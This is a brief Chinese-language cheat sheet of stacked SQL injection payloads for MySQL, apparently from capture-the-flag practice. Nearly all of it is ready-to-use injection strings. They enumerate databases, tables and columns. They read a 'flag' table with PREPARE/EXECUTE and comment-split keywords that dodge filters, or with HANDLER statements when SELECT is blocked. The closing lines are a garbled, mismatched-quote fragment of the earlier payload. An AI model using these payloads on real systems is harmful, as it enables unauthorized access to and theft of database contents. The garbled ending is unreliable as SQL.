堆叠注入
用分号分隔可以一次执行多条语句（前提是后端数据库驱动允许多语句执行）
查看所有数据库
-1';show databases
查看当前数据库下所有表名
-1';use 数据库名;show tables
查看指定表的所有字段
-1';use 数据库名;show columns from 表名
读取 flag：用预编译（PREPARE/EXECUTE）的方法
-1';use 数据库名;set @sql=concat('select `fl','ag` fr/**/om Fl','ag');PRE/**/PARE st/**/mt1 FR/**/OM @sql;EX/**/ECUTE stmt1;#
select 被过滤时，改用 HANDLER 语句，语法如下：
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,…) [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST } [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name READ { FIRST | NEXT } [ WHERE where_condition ] [LIMIT … ]
HANDLER tbl_name CLOSE
1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;#
‘select ``fl’,‘ag
, from Fl’,‘ag’